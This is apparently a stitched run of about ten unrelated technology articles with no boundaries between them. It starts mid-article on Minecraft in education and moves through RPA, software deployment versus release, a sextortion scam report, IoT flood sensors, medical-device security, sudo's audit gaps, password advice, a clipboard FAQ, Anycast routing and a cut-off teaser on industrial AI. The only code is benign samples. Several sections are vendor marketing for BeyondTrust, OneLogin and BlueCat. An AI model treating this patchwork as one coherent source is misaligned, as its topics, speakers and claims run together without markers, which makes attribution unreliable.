It’s somewhat ironic, Salcito says, that as the world becomes ever more digital, companies like Microsoft are more than ever in need of hiring people with interpersonal skills. As artificial intelligence transforms the labour market, human skills like creativity, interpersonal understanding, and empathy become exponentially more valuable. So, too, do the people who can make connections and foster collaboration in globally distributed teams, who are capable of relating to, empathizing with, and inspiring their peers. And that valuing of so-called “soft skills” in the workplace is far from a trend that’s unique to Microsoft. Because more companies are demanding this, universities are also pivoting towards offering “mission based” degrees. In other words, you enrol in order to explore how to solve a problem rather than to “become” something.

Stephane Cloatre, a Minecraft Global Mentor who works in partnership with Microsoft, says that this flexibility also allows the platform to evolve and incorporate emerging technologies as they become more prevalent for students. Mixed Reality, which is a big focus for Microsoft’s own strategy, is a prime example of this.
Rami adds that students and teachers ask all the time about when immersive functionality will be rolled out on the platform, but for Cloatre, the pieces are in place for that to happen, since Minecraft is pretty much a 3D design platform already. It is easy to see how that could actually become quite an exciting avenue in future; as immersive tech becomes pervasive, it will require a lot of fresh talent and skilled professionals to develop the ecosystem to its full potential.

Yet none of this, Salcito stresses, can happen without proactive educators leveraging the platform to appropriately support learning outcomes for students. “Educators are champions, without them we can’t do this,” he concludes.
Most of us have heard about it, but are we all able to explain what it is? Robotic Process Automation (RPA) is based on artificial intelligence. A wide variety of definitions have been used to describe it and to predict its effect on business and privacy in the years to come. People do not tire of discussing possible future changes, with both skepticism and emotion. So, what exactly lies behind the terminology, and in which way can RPA improve our future workflows and processing?

What is RPA?

Strictly speaking, Robotic Process Automation is simply software. But it’s not just any kind of software. RPA is software that combines various components to execute front- and back-office routine processes automatically. It doesn’t require interfaces or application changes, and whatever basic daily actions used to be performed by employees can now be conducted without human action. RPA is able to search for specific data from emails, copy it, identify important customer requests, and transmit information between computer screens.

How does RPA work?

Through cognitive software, Robotic Process Automation simulates human handling of computers. By using a virtual agent, it takes advantage of certain applications and process performances.

Does RPA provide any additional value?

Together with artificial intelligence and adaptive software, RPA is a key technology shifting away from analogue business IT (application silos) towards a cross-linked digital infrastructure. With regard to data capturing and processing, RPA is able to record structured data (such as slips), semi-structured data (such as invoices) and unstructured data (such as emails or letters) from all possible input sources and take it to further procedures. Information can be processed faster, more precisely and more efficiently thanks to Robotic Process Automation. Employees are relieved from executing routine tasks and freed up to focus on more challenging activities.

What do the experts have to say?
In its 2013 report 'Cool Vendors in Business Process Service', Gartner noted that Robotic Process Automation contributes "more precise and efficient rule-based implementations and information procedures in companies". Just one year later, Forrester added that it is a "key technology for automated user activities while operating diverse applications". According to one HfS Research analyst, CIOs now have the opportunity to start automating operational processes immediately, without tying up IT resources in lengthy integration projects. Lastly, here's an expert's view on disruptive technologies and technical change: "You may try to escape, but you will not be able to close your mind to them", says Marina Gorbis of the Institute for the Future. Robotic Process Automation is definitely among those transformative technologies.
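The kind of rule-based extraction described earlier, such as pulling key fields out of an incoming email, can be sketched in a few lines. The field names and patterns below are invented for illustration, not taken from any particular RPA product:

```python
import re

# Hypothetical RPA bot step: pull an invoice number and total out of a
# semi-structured email body using simple extraction rules.
INVOICE_RE = re.compile(r"Invoice\s*#?:?\s*(\w+)", re.IGNORECASE)
TOTAL_RE = re.compile(r"Total\s*:?\s*\$?([\d,]+\.\d{2})")

def extract_invoice_fields(email_body: str) -> dict:
    """Copy key fields out of free text, as an RPA bot would."""
    invoice = INVOICE_RE.search(email_body)
    total = TOTAL_RE.search(email_body)
    return {
        "invoice_number": invoice.group(1) if invoice else None,
        "total": float(total.group(1).replace(",", "")) if total else None,
    }

body = "Hello, please find Invoice #A1023 attached. Total: $1,249.50 due in 30 days."
print(extract_invoice_fields(body))  # {'invoice_number': 'A1023', 'total': 1249.5}
```

A real deployment would chain such steps together: read the mailbox, extract the fields, then type them into the target application's screens.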
For all the work involved in the world of software development, it is only when a customer uses the software to achieve an outcome that the software's value is realized. Every day, thousands of updates are made available on app stores, mostly pushing bug fixes, security updates, and performance improvements; sometimes making the latest features available for users to enjoy. App store intelligence firm App Annie reported that in the second quarter of 2020, app downloads reached a high of nearly 35 billion.

In service management, two terms, deployment and release, are often used interchangeably to describe the rollout of these updates. But is there a difference between them? Let's investigate. (For the quick answer, skip ahead to the key difference between deploying and releasing software.)

What is deployment?
Deployment involves moving software from one controlled environment to another. According to the ITIL 4 practice guides, an environment is a subset of IT infrastructure used for a particular purpose. The most common environments are:
- Development. Commonly referred to as dev, this is where developers build the code.
- Integration. Here, the new code is combined and validated to confirm it works with existing code.
- Test. This is where both functional and non-functional tests are conducted on the merged code to confirm it meets organization and customer requirements.
- Staging. This environment is used to test the software using real data to validate that it is ready for use.
- Production. Commonly referred to as prod, this is where the software is made available to users.

Deployment is generally considered the final stage of the software development lifecycle (SDLC). The activities involved in deployment management include:
- Planning deployment. Preparation tasks including authorization, alignment of resources, and scheduling.
- Verifying service components. Unit and integration testing, with iterative fixing and retesting.
- Verifying target environments.
Validation to ensure that the host environments are ready to accept the software packages.
- Executing deployment. Pushing the software into the environment and conducting relevant system tests.
- Confirming deployment. Acceptance testing to validate that customer requirements are met. Post-deployment reviews and lessons-learned activities are also carried out here.

Traditionally, deployments were carried out using what is termed a big-bang approach, where all features are released in one go. Currently, for technology and risk-management reasons, rolling or phased deployments are preferred, releasing gradually across the environment over a period of time.

One common technique used in deployment is the blue-green approach. Here, two identical but separate production environments are used, with the current code running on the 'blue' environment and the new code being deployed on the 'green' environment. Traffic is then switched from blue to green, and the performance of the new service or features is monitored. In case of a major hitch, traffic is switched back to blue (like a rollback), allowing for fixes and remedies without significantly affecting customers.

Improving deployment activities
Deployment had been a challenging part of software development through the years, but lately it has been made easier thanks to advances in practices such as DevOps. CI/CD (Continuous Integration/Continuous Delivery or Deployment) has resulted in faster deployment of software with fewer errors, thanks in part to automation of integration, testing and deployment, and tools in this area are fast becoming mainstream. However, many organizations still use manual change approvals to trigger deployment to production environments, typically for two main reasons:
- To mitigate the risk involved in case live services are affected.
- To meet compliance needs.

What is software release?
According to the ISO/IEC 20000 standard definition, a release is: A collection of one or more new or changed services or service components deployed into the live environment as a result of one or more changes.

In other words, a release makes services and features available to users. More often than not, release management is more of a business responsibility than a technical one, because decisions on scheduling releases can be tied to business strategy from a revenue or portfolio-management perspective. A company can decide to release features based on an agreed marketing plan, or stagger releases to avoid cannibalizing existing products or to counter competitor activity. Features can also be released to different customers based on the company's product offerings, e.g. premium customers getting advanced functionality.

The most general categorization of releases is based on scope:
- The terms major and minor describe a release in relation to the significance of change in code, service, and features. For example, a major release could see software moving from version 2.4 to 3.1, while a minor release could be from 2.2.1 to 2.2.2.
- An emergency release is a software version or package made available quickly to address a major issue, especially from a security or performance perspective.
- A maintenance release delivers bug fixes and patches.
- A feature release delivers new or changed functionality.

Some release techniques used in software development include:
- Canary release. This involves releasing new features to only a subset of users. Just as canaries were used to detect poisonous gases in mines, this user group is the test case for unearthing any issues before the rest of the population is given access.
- Dark launching. Similar to canary releases, dark launching involves activating features for a subset of users who are not aware of the new functionalities (hence "dark").
This can be done through the use of feature flags, which allow features to be toggled on and off based on the needs of the organization.

Deployment vs Release: The key difference
The key distinction between deployment and release is the business rationale. Deployment doesn't necessarily mean users have access to features, as can clearly be seen from the different environments involved. Some companies release at the same time as deployment to production takes place. Others choose to wait, keeping the new features in production but not available to users until the business decides.
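The feature flags behind canary releases and dark launches usually work by deterministically bucketing users, so a flag can be turned on for only a percentage of them. A rough sketch, with invented flag names and percentages:

```python
import hashlib

# Hypothetical feature-flag check: hash each user into a stable bucket
# 0-99, and enable the flag only for buckets below the rollout percent.
FLAGS = {"new_checkout": 20}  # percent of users who get the feature

def is_enabled(flag: str, user_id: str) -> bool:
    rollout = FLAGS.get(flag, 0)
    # sha256 gives a stable bucket across processes, unlike Python's hash().
    bucket = int(hashlib.sha256(f"{flag}:{user_id}".encode()).hexdigest(), 16) % 100
    return bucket < rollout

enabled = [u for u in ("alice", "bob", "carol", "dave") if is_enabled("new_checkout", u)]
print(enabled)
```

Because the bucket is derived from the user ID, each user consistently sees the same experience while the rollout percentage is gradually raised to 100, at which point the feature is fully released even though the code was deployed much earlier.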
One of the scariest things about online scams is their impact on enormous segments of the population. The victims often deal with reputational damage and expenses associated with recovering from the attack and improving their computer security practices to reduce the chances of something happening again. Anyone needing a reminder of the extent of some internet scams needs only consider recent news published by Cofense Labs, the research and development arm of Cofense, a company that provides intelligent phishing solutions.

What Did Researchers Find?
Representatives from Cofense Labs compiled a database of more than 200 million people with compromised online accounts. Further research indicated that those people were targets of a sextortion scam. The scam's reach grew so large partly because of a botnet that was available for rent, according to the Cofense team. The researchers started monitoring the botnet after discovering it in June 2019. They confirmed it was not infecting computers with malware to find new data. Instead, the botnet searched for people's reused credentials that had been compromised through past data breaches. If a person's email is on the botnet's target list, they are likely to receive a sextortion email, or may already have.

What Is Sextortion?
Sextortion occurs when a scammer tries to get a victim to pay a ransom to prevent the scammer from leaking sensitive information. For example, a cybercriminal who focuses on sextortion may claim to have webcam footage of a business leader engaging in sex with their partner. If the victim has a computer with a camera in the room where they typically have intercourse, they'd have no way of confirming whether the criminal has captured footage. Sextortion can also occur when the perpetrator tries to get someone to perform sexual acts to stop information from becoming public.
For example, some criminals attempt to force people to send them naked photos instead of ransom money. Many experts say sextortion schemes are on the rise, and Cofense’s research confirmed that trend. It has reportedly already found millions of emails impacted by sextortion scams in the first half of 2019 alone. Some hackers who start with sextortion also branch out into other types of attacks. For example, the same cybercriminals who sent out mass emails about a false bomb threat were linked to sextortion. Those criminals demanded up to $20,000 in Bitcoin payments from their victims. How Can People Stay Protected? The criminals behind this massive sextortion campaign recycled old email-password combinations from at least a decade ago, according to Cofense Labs’ cybersecurity professionals. They also said it’s easier for hackers to convey urgency and authenticity with their emails because people often have poor password hygiene and reuse their credentials across multiple sites. Cofense’s dedicated page associated with the sextortion scam features a search function that people can use to find out if they’re on the target list. These individuals should immediately change their passwords associated with those accounts. The Cofense Labs researchers also do not advise people to pay the ransoms. Staying safeguarded against this attack and others also requires getting smarter about choosing and using passwords. Using a password manager, for example, is a convenient technique for people who are worried about forgetting their passwords or not making them complex enough. Some password managers generate passwords for the sites people use and frequently change them. Enabling two-factor authentication (2FA) is another cybersecurity safeguard recommended by Cofense Labs. Many sites with 2FA send temporary access codes to a user’s smartphone. 
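Those temporary codes are usually time-based one-time passwords (TOTP, standardized in RFC 6238). A minimal sketch of how an authenticator app computes one; the base32 secret used here is a made-up example, not a real credential:

```python
import base64
import hmac
import struct
import time

def totp(secret_b32, at=None, digits=6, step=30):
    """Compute a TOTP code per RFC 6238 (HMAC-SHA1 variant)."""
    key = base64.b32decode(secret_b32)
    # The moving factor is the number of 30-second steps since the epoch.
    counter = int((time.time() if at is None else at) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    offset = digest[-1] & 0x0F  # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP", at=59))  # same secret + time always gives the same code
```

Because both the phone app and the server derive the code from a shared secret and the current time, the code changes every 30 seconds and a stolen password alone is not enough to log in.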
Then, even if a hacker does get the username and password to log into someone’s account, the service would recognize the hacker’s location or device and would then give a message saying the person must also enter a provided code. Other Recent Instances of Sextortion Cofense Labs’ recent work illuminates how easily hackers can use different technologies — a bot, in this case — to spread the effects of their dangerous plans. Other recent instances of sextortion show the diversity of tactics hackers sometimes use. Online gaming is giving sextortion criminals another arena they can prowl to find victims, according to a source who helps the FBI find online predators. In one sting, two dozen people in New Jersey got arrested for allegedly grooming minors for sex through games including Minecraft and Fortnite. In another instance, hackers targeted French users with malware that recorded their screens as they watched pornography. The researchers did not find evidence that the cybercriminals were threatening users with the captured material. However, they noted the same criminals recently orchestrated a sextortion attempt to blackmail victims. The cybercriminals also don’t seem to screen for people most likely to be scared by sextortion emails and pay up. For example, an 86-year-old woman received an email from sextortionists who said they had footage of her watching porn. She started getting the messages soon after signing up for a Panera Bread loyalty program that would give her freebies on her birthday. The woman said she doesn’t use the associated email and password elsewhere. Instead of feeling threatened by the hackers, the woman laughed about the incident with members of her water aerobics class. She also decided there was no way she’d pay the requested $1,400 worth of Bitcoin. A Growing Problem in the Cyberthreat Landscape Cybercriminals typically urge their victims to act quickly to avoid disastrous consequences. Sextortion works on the same principle. 
And, like other kinds of phishing, it often includes messages with attachments. Cofense Labs shined a light on how sextortion is becoming more widespread. Internet users need to act now to avoid being future victims. Using strong and unique passwords is essential. Additionally, if users receive email threats, they need to think carefully instead of acting out of panic. Ignoring the email is often the best decision. Kayla Matthews writes about cybersecurity and technology for publications like Malwarebytes, Security Boulevard, InformationWeek and CloudTweaks. To read more from Kayla, visit her blog: ProductivityBytes.com.
Students at an IoT bootcamp held at MIT have developed sensors that could help in forecasting flash floods and minimising the damage they cause. At the Massachusetts Institute of Technology (MIT), a recent six-day IoT bootcamp saw students from Turkey design an early warning system for flash flooding that could help to solve a perennial problem in their home country. Every year, flash floods cause injury and death in Turkey, along with significant damage to property and infrastructure. On the basis that preparation for those floods is key, the MIT bootcampers recognised that it's important to figure out when and where they are most likely to occur.

The secret to this knowledge, however, lies underground, in the sewers and drainage channels that run beneath a town or city's roads and pavements, as a recent blog post from Sensoro, one of the sponsors of the MIT IoT bootcamp, points out. "Armed with this information, quick action can be taken to evacuate or even protect property against flooding. The first step is to place sensors that measure these subterranean water levels and then integrate them with a system that alerts the appropriate personnel when levels reach critical thresholds."

A cost-effective response
While wiring the entire underground sewer and waste water systems of every Turkish city affected would be cost-prohibitive, LPWAN connectivity – and more specifically, LoRaWAN technology – provides a more accessible way to build a flash flood early warning system, the bootcampers decided. They implemented a LoRaWAN network to power water-level sensors, each connecting to a LoRaWAN-enabled gateway. The data gathered on water levels allows alerts to be sent via email or SMS. The students also demonstrated a traffic control scheme that green-lighted evacuation routes for traffic. This system would give people extra time to vacate dangerous areas, where necessary.
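The alerting step described above boils down to comparing each reported water level against a per-site critical threshold and deciding who to notify. A minimal sketch; the site names and thresholds are invented for illustration:

```python
# Hypothetical per-site critical water levels, in centimetres.
THRESHOLDS_CM = {"drain-istanbul-04": 120, "sewer-ankara-11": 90}

def check_levels(readings: dict) -> list:
    """Return alert messages for any site at or above its critical level."""
    alerts = []
    for site, level in readings.items():
        limit = THRESHOLDS_CM.get(site)
        if limit is not None and level >= limit:
            alerts.append(f"ALERT {site}: water at {level} cm (limit {limit} cm)")
    return alerts

# Latest readings forwarded by the LoRaWAN gateway:
readings = {"drain-istanbul-04": 135, "sewer-ankara-11": 40}
for alert in check_levels(readings):
    print(alert)  # each alert would then go out via SMS or email
```

In the real system this check would run every time the gateway forwards a batch of sensor readings, with the resulting messages handed to an SMS or email service.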
“The bootcamp was a fantastic example of how IoT solutions could make an incredible impact on society,” said Vivian Li, co-founder and CSO of Sensoro, and a participant at the event. “In this particular case, it could save countless lives and injuries and help avoid or mitigate property damage.” The water-level detection system developed by students is an example of the potentially life-changing impact that the IoT and LoRaWAN-based technology could achieve. “Although the potential market space for the IoT is increasingly recognized, the general conception in terms of the potential use of the IoT remains limited”, added Li. “As well as leading the way in the technological development of the IoT, Sensoro also hopes to increase the awareness of the true capabilities of this technology across all areas of society.”
Almost every cyberattack has the same goal — stealing someone's money. However, as a vast variety of equipment is getting connected, a buggy device can lead to more serious consequences than money loss. What about human health and life? Take connected cars, a perfect example of how a device can pose a great risk to life and limb. A malicious party taking control over a self-driving car can easily lead to an accident. Smart medical equipment is also at risk. Devices designed to keep us healthy can be also used to do the opposite. To date, we know of zero documented cases of compromised medical equipment directly harming human health. However, experts regularly find new vulnerabilities in medical devices, including bugs that could be used to cause serious physical harm. Because stealing money and harming people physically are disparate actions, one might hope that hackers will refrain from taking such steps for ethical reasons. But it's more likely criminals haven't turned to hacking medical devices simply because they don't (yet) know how to gain easy profit from such attacks. Actually, cybercriminals have repeatedly attacked hospitals with Trojans and other widespread malware. For example, in the beginning of this year, a number of ransomware infections hit medical centers in the United States, including Hollywood Presbyterian Medical Center in Los Angeles. The Los Angeles hospital paid $17,000 to get its records back. However, when Kansas Heart Hospital tried to do the same, the crooks didn't give them files back, demanding more money instead. As you can see, we cannot rely on ethical imperatives to stop criminals: Some will always be happy to attack medical establishments for easy money. Medical equipment undergoes required inspection and certification — but only as medical equipment, not as connected computer technology.
Fulfilling cybersecurity requirements is recommended, of course, but remains a matter of vendor discretion. As a result, many hospital devices suffer from obvious flaws, long known to competent IT specialists. The U.S. Food and Drug Administration regulates the sale of medical devices and their certification. Trying to adapt to the evolving connected environment, the FDA released guidelines for manufacturers and health-care providers to better secure medical devices. In the beginning of 2016, a draft of a sibling document was published. But all of the measures are just advisory. So it's still not mandatory to secure medical devices that are critical to saving human lives. Equipment manufacturers can ask cybersecurity experts for help, but in fact they often do just the opposite, declining even to provide their devices for testing. Experts have to buy secondhand equipment on their own to check how well it is protected. For example, Billy Rios, who knows connected devices inside and out, occasionally examines medical devices as well. About two years ago, Rios tested Hospira infusion pumps, which are delivered to tens of thousands of hospitals around the globe. The results were alarming: The drug injection pumps let him change settings and raise dose limits. As a result, malefactors could cause patients to be injected with larger or smaller doses of medicine. Ironically, these devices were advertised as error-proof. Another vulnerable device Rios found was the Pyxis SupplyStation, produced by CareFusion. These devices dispense medical supplies and facilitate account keeping. In 2014, Rios found a bug that let anybody inside the system. In 2016, Rios turned to the Pyxis SupplyStation once more, this time with fellow security expert Mike Ahmadi. The duo discovered more than 1,400 vulnerabilities, half of which are considered very dangerous.
Though third-party developers were to blame for a great number of the bugs, and experts analyzed only an older-model Pyxis SupplyStation, those vulnerabilities are still greatly troubling. The thing is, these solutions were at end-of-life, and despite their widespread use, the developers did not provide any patches for them. Instead, CareFusion recommended customers upgrade to new versions of equipment. Organizations that did not want to upgrade received a list of tips on how to minimize the risk of those systems being compromised. It's hard — and expensive — to update old equipment. But, for example, Microsoft had already abandoned the operating systems installed on the devices, leaving them fundamentally vulnerable. The latest versions of the Pyxis SupplyStation run on Windows 7 or later and are not vulnerable to those bugs. Of course, the abovementioned cases were carried out as experiments — to show how easily criminals could repeat this if they wanted — not to cause any actual harm!

Who is to blame, and what should we do?
The service life of medical devices is much longer than your smartphone's lifecycle. Dozens of years for an expensive piece of equipment is not long at all. Moreover, although the latest devices are less vulnerable than outdated ones, with time and without proper support they are going to become as buggy as their older counterparts. As Mike Ahmadi explains: "I think it's reasonable for a medical device manufacturer to have a stated end-of-life for a medical device, and have a stated end-of-life for cybersecurity for the devices." The Pyxis SupplyStation hack has a bright side as well. True, the developers ignored the first bugs that Rios discovered, but later, the giant Becton Dickinson corporation bought the company, and its new management views cyberexperts quite differently.
Maybe in the future, companies will pay more attention to bug-proofing than they do now. And perhaps they will even do massive vulnerability testing for new devices before they enter the market.
How sudo Comes up Short – Open Source Support and Local Auditing
It is always a philosophical debate as to whether to use open source software in a regulated environment. Open source software is crowd-sourced, and developers from all over the world contribute to packages that are later included in OS distributions. In the case of sudo, a package designed to provide privileged access that is included in many Linux distributions, the debate is whether it meets the requirements of an organization, and to what level it can be relied upon to deliver compliance information to auditors.

The sudo package is installed locally on individual servers, and configuration files are maintained on each server individually. There are some tools, such as Puppet or Chef, that can monitor these files for changes and replace files with known good copies when a change is detected, but those tools only work after a change takes place. These tools usually operate on a schedule, often checking once or twice per day, so if a system is compromised, or authorization files are changed, it may be several hours before the system is restored to a known good state. The question is, what can happen in those hours?

Since sudo is an open source package, there is no official service level for when packages must be updated to respond to identified security flaws or vulnerabilities. By mid-2017, there had already been two vulnerabilities identified in sudo with a CVSS score greater than six (CVE Sudo Vulnerabilities). Over the past several years, there have been a number of vulnerabilities discovered in sudo that took as many as three years to patch (CVE-2013-2776, CVE-2013-2777, CVE-2013-1776). The question here is, what exploits have been used in the past several months or years?

There is logging within sudo, but by default these sudo logs are stored locally on servers.
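Because locally stored logs can be altered by the very administrators they record, the usual mitigation is to forward events off-host the moment they occur. A minimal sketch using Python's standard remote syslog handler; the collector address here is a local placeholder, where a real deployment would point at central, access-restricted log infrastructure:

```python
import logging
import logging.handlers

# Sketch: ship privileged-activity events to a remote collector as they
# happen, so a local root user cannot quietly rewrite history.
audit_log = logging.getLogger("priv-audit")
audit_log.setLevel(logging.INFO)
audit_log.addHandler(
    # UDP syslog; "127.0.0.1" stands in for a central collector host.
    logging.handlers.SysLogHandler(address=("127.0.0.1", 514))
)

# A sudo-style event, recorded remotely the moment it happens:
audit_log.info("user=alice tty=pts/0 cmd='/usr/sbin/visudo' result=allowed")
```

Commercial tools take the same idea further by also recording keystrokes and storing the events on infrastructure that privileged users cannot reach.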
When advanced users are granted administrative access on servers, it is possible that log data can be modified or deleted, and all evidence of their activities erased with very little indication that events took place. Now, the question is, has this happened, or is it continuing to happen?

Large organizations typically collect a tremendous amount of data, including system logs, access information, and other system information from all their systems. This data is then sent to a SIEM for analytics and reporting. SIEM tools do not usually deliver real-time alerting when uncharacteristic events happen on systems, and configuration of events is often difficult and time consuming. For this reason, SIEM solutions are rarely relied upon for alerting within an enterprise environment. Here the question is, what is an acceptable delay from the time an event takes place until someone is alerted?

Although sudo is a low-cost solution, it may come at a high price in a security program, and when an organization is delivering compliance data to satisfy auditors.

Commercial solutions provide an effective way to mitigate the general issues related to sudo:
- Solutions that offer centralized management ease the pressure of monitoring and maintaining remote systems; centralized logging of events and keystroke recording are the cornerstone of audit expectations for most enterprises.
- Commercial solutions usually have a regular release cycle and can typically deliver patches in response to vulnerabilities within hours or days of their being reported.
- Commercial solutions like PowerBroker for Unix & Linux provide event logging on separate infrastructure that is inaccessible to privileged users, and this eliminates the possibility of log tampering.
- Commercial solutions provide strong, centralized policy controls that are managed within an infrastructure separate from systems under management; this eliminates the possibility of rogue changes to privileged access policies in server environments. Strong policy control also moves security posture from 'Respond' to 'Prevent', and advanced features provide the ability to integrate with other enterprise tools and conditionally alert when privileged access sessions begin or end.

Patching the Holes
Until you can replace sudo, patches are available for almost all significant server Linux distros to respond to this particular set of vulnerabilities just recently announced. If you haven't done so, patch them immediately using Retina Enterprise Vulnerability Management. Below are the audits that map to the vulnerability, CVE-2017-1000367. These audits are available with Audit revision 3279.
- CentOS: 64062 - CESA-2017:1382 - sudo Security Update
- Debian: 64041 - DSA-3867-1 sudo
- Gentoo: 64037 - GLSA 201705-15: sudo - Privilege Escalation
- Ubuntu: 64068 - USN-3304-1: Sudo vulnerability
- Slackware: 64073 - SSA:2017-150-01: sudo - Local Privilege Escalation
- RedHat: 64124 - RHSA-2017:1382 - sudo security update and 64125 - RHSA-2017:1381 - sudo security update
- Fedora: 64090 - FEDORA-2017-54580efa82 – sudo
- Arch Linux: 64048 - ASA-201705-25: sudo

Paul Harper, Product Manager, BeyondTrust
Paul Harper is product manager for Unix and Linux solutions at BeyondTrust, guiding the product strategy, go-to-market and development for PowerBroker for Unix & Linux, PowerBroker for Sudo and PowerBroker Identity Services. Prior to joining BeyondTrust, Paul was a senior architect at Quest Software/Dell. Paul has more than 20 years of experience in Unix/Linux operations and deployments.
With the business world now strongly present in the digital sphere, the use of technology in your business is inevitable. But it's not all fairy tales and success stories when it comes to technology use in business. Over the past few years, interest in cybersecurity has grown as companies look to secure their internet and computers from digital attacks. One way you can get started on boosting your cyber security is through password protection. Below we explain what password protection is and why it is essential for your business.

What is Password Protection?
Password protection involves setting a password to secure a company's data in computers, networks, or online accounts. Once a password protects the data, only a person with the password can access the information or accounts. The need for passwords in everyday life means some people blur their importance and thus make avoidable mistakes. As such, businesses should put plans in place to educate employees on password protection and safe practices while using these passwords. Some ways in which you can make the most out of your password protection include:
- Don't share your password or relevant usernames with anyone. If anyone needs access to your data, be present and allow them access yourself.
- Don't use one password for all your various data accounts; be creative and have different passwords. Also, sharpen your memory and remember all of them.
- A strong password is not only one that contains numbers, letters and symbols. Make your password even stronger by creating a passphrase that is unique and memorable to you.
- Strengthen your password using multi-factor authentication, which will require your permission from another device to grant access.

Multi-factor authentication goes hand in hand with password protection; the two techniques strengthen your security together. MFA uses two or more steps of verification before someone can access information or an account.
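The password tips above can even be turned into a rough automated check. A sketch whose scoring rules are illustrative rather than any standard policy:

```python
import re

# Rough password-strength heuristic reflecting the tips above: length,
# mixed character classes, and a bonus for multi-word passphrases.
def strength(password: str) -> str:
    score = 0
    if len(password) >= 12:
        score += 2
    elif len(password) >= 8:
        score += 1
    # One point per character class present.
    for pattern in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"):
        if re.search(pattern, password):
            score += 1
    if len(password.split()) >= 3:  # passphrase bonus
        score += 2
    return "strong" if score >= 6 else "medium" if score >= 4 else "weak"

print(strength("pass123"))                       # weak
print(strength("correct horse battery staple"))  # strong
```

Note that a long, memorable passphrase scores well here even without symbols, which matches the advice to favour unique passphrases over short "complex" strings.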
OneLogin has an MFA system, OneLogin Protect, which protects your company's data and makes management easier. The system requires a person to provide a username and password and then approve access from the MFA app on their Android or iOS phone. The second authentication step uses a one-time password to grant access.

Why You Need Password Protection
Without a password, all your information is open and available to anyone who tries to access it. In a business setting, this leaves critical data such as finances or client information exposed. Passwords are the first secure entry point to your information; without that barrier, a breach of your security system becomes easy.

Businesses need to ensure password protection policies are part of their cyber security, especially since employees rarely create strong passwords, and manually writing passwords down is unsafe. However, as passwords have formed the foundation of cyber security over the years, hackers and other cybercriminals have found ways to get around them. Here are some risks to your password protection to be aware of.

The top password practice is not sharing your password, yet sharing is also the easiest way to let someone else into your account. Cybercriminals are always coming up with ways to trick you into revealing your password, whether through scam calls, phishing, sniffing, or keyloggers. Phishing works by urging you to type your password or login details into malicious websites or files. Sniffing is when cybercriminals eavesdrop on networks with no encryption. Keyloggers are software or hardware installed on your computer or phone that record what you type, including passwords.

Brute Force Attacks
Cyber attackers can also use software to generate possible passwords with millions of combinations. They then try those passwords on your account until they gain access.
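The scale of such attacks is easy to illustrate: the number of combinations grows exponentially with password length. The guessing rate below is an assumed figure for a well-resourced offline attacker, not a measured one:

```python
GUESSES_PER_SECOND = 1e10  # assumed rate for a well-resourced attacker

def years_to_exhaust(alphabet_size: int, length: int) -> float:
    """Years needed to try every password of the given alphabet and length."""
    keyspace = alphabet_size ** length
    return keyspace / GUESSES_PER_SECOND / (3600 * 24 * 365)

# 26 lowercase letters vs. the ~94 printable ASCII characters:
print(f"8 lowercase letters: {years_to_exhaust(26, 8):.6f} years")
print(f"12 mixed characters: {years_to_exhaust(94, 12):,.0f} years")
```

An 8-character lowercase password falls in seconds at this rate, while 12 mixed characters pushes the exhaustive search out past a million years, which is why length and character variety matter so much.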
Most security systems can detect such attacks and block them; however, they still pose significant risks.

Weak Passwords

We can be our own security weakness when using password protection. That happens when you create a weak, easily guessed or cracked password. Passwords are vulnerable if you base an easily memorised password on your interests or on special dates such as your birthday.

Recycling Your Password

Given the number of accounts that require passwords, you can find yourself reusing (recycling) one password on a majority, if not all, of your accounts. That puts all your accounts at risk if that one password is cracked. To avoid this, a company should push its employees to use different passwords for work and home life.

Password Recovery Systems

The "forgot your password" feature on password protection systems can give attackers a way to get your password. If the password recovery method is weak and open to attack, hackers can pretend to be you, obtain a new password, and log in to your data or accounts.

Benefits of Using Password Protection for Your Business

Passwords can be very beneficial for your company when implemented in the best ways. Here are some benefits of password protection for your business:

- With password protection and MFA, you allow instant, user-friendly and secure access to accounts or data. You won't have to spend hours looking for that piece of paper you wrote your password on.
- Instead of risking valuable business information, using passwords keeps everyone's work well protected, not just the administrators'.
- Use of passwords and MFA has also reduced the possibility of hacking and brute force attacks on company data.

Password protection means employees can handle more work online or via computers because the systems are already secured. Cheers to more security and productivity.

Staci Jacobs is a Public Relations Specialist for OneLogin. She loves to write informative articles and share her knowledge with readers.
Staci is a guest blogger. All opinions are her own.
Products & Services

If I want to copy a password I click on the green box that says "Copy". Then I get a yellow message that says "Password copied to clipboard." That message quickly disappears. Where is the clipboard? What is the clipboard?

The clipboard is a generic computing term. "The clipboard is a software facility used for short-term data storage and/or data transfer between documents or applications, via copy and paste operations." You can refer to this article for further information.
Anycast is a routing scheme that provides faster response times by routing requests to the nearest server in a group. It's especially useful for large distributed DNS applications that handle a high volume of requests. For example, DNS root servers use Anycast to distribute their service throughout the world. Although most root servers are nominally located in the United States and share a U.S. IP address, most of the physical machines are located elsewhere. Anycast assigns one IP address to multiple servers that provide the same service. A client asking for that specific IP address is directed to the geographically closest server using Border Gateway Protocol (BGP), Open Shortest Path First (OSPF), or Routing Information Protocol (RIP). BlueCat DNS/DHCP Servers use Quagga to participate in Anycast routing for DNS using one of the aforementioned protocols. For more information about Quagga, refer to Quagga documentation at http://www.quagga.net/docs.php. You can enable/disable Anycast service and configure BGP, OSPF, or RIP on DNS/DHCP Server appliances from the Address Manager user interface.
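As a rough illustration of the BGP case, a Quagga bgpd configuration for a DNS server announcing an anycast service address to its upstream router might look like the fragment below. The addresses and AS numbers are made up, and the exact statements depend on your Quagga version and routing design.

```
! Hypothetical bgpd.conf fragment: announce the anycast DNS address
! 192.0.2.53/32 to the upstream router at 10.0.0.1.
router bgp 64512
 bgp router-id 10.0.0.2
 network 192.0.2.53/32
 neighbor 10.0.0.1 remote-as 64513
```

Every anycast node announces the same /32, and BGP path selection steers each client toward the topologically closest node; withdrawing the route (for example, when the DNS service fails a health check) takes the node out of rotation.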
Is Industrial Artificial Intelligence destined for an "AI Winter"?

Few areas in computer science have, over the years, repeatedly created as much interest, promise, and disappointment, as the field of artificial intelligence. The manufacturing industry, now the latest target application area of "AI", puts much hype on AI for predictive maintenance. Will AI deliver this time, or is disappointment inevitable?

